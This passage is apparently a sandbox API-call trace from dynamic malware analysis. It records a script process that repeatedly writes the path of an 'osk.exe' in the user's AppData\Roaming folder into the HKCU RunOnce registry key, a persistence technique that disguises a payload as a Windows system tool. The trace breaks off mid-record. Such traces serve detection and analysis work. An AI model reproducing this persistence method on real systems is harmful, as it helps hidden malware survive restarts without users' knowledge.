0x0 [0077.694] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0077.694] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0077.695] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0077.695] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0077.695] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0077.695] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0077.695] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0077.695] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0077.695] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x11 [0077.695] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0077.695] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x12 [0077.695] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0077.696] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x11 [0077.696] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.696] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0077.696] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.696] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.696] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.696] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0077.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0077.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0077.696] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0077.696] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0077.697] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0077.697] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0077.697] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0077.697] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0077.697] RegCloseKey (hKey=0x280) returned 0x0 [0077.697] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.697] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.697] SetTimer (hWnd=0x20280, nIDEvent=0x2011, uElapse=0xa, lpTimerFunc=0x0) returned 0x2011 [0077.697] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.709] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.709] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.709] KillTimer (hWnd=0x20280, uIDEvent=0x2011) returned 1 [0077.709] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.710] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0077.710] IUnknown:Release (This=0x787518) returned 0x1 [0077.710] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0077.710] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0077.710] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0077.710] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0077.710] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0077.710] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0077.710] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0077.710] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0077.710] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0077.710] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x12 [0077.710] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0077.710] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x13 [0077.711] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0077.711] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x12 [0077.711] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.711] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0077.711] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.711] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.711] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.711] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0077.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0077.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0077.712] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0077.712] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0077.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0077.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0077.712] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0077.712] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0077.712] RegCloseKey (hKey=0x280) returned 0x0 [0077.712] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.712] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.712] SetTimer (hWnd=0x20280, nIDEvent=0x2012, uElapse=0xa, lpTimerFunc=0x0) returned 0x2012 [0077.712] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.725] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.725] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.725] KillTimer (hWnd=0x20280, uIDEvent=0x2012) returned 1 [0077.725] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.725] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0077.725] IUnknown:Release (This=0x787518) returned 0x1 [0077.725] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0077.725] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0077.725] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0077.726] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0077.726] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0077.726] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0077.726] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0077.726] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0077.726] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0077.726] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x13 [0077.726] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0077.726] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x14 [0077.726] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0077.727] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x13 [0077.727] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.727] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0077.727] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.727] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.727] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.727] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0077.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0077.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0077.727] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0077.727] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0077.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0077.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0077.727] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0077.727] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0077.728] RegCloseKey (hKey=0x280) returned 0x0 [0077.728] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.728] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.728] SetTimer (hWnd=0x20280, nIDEvent=0x2013, uElapse=0xa, lpTimerFunc=0x0) returned 0x2013 [0077.728] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.741] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.741] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.741] KillTimer (hWnd=0x20280, uIDEvent=0x2013) returned 1 [0077.741] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.741] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: 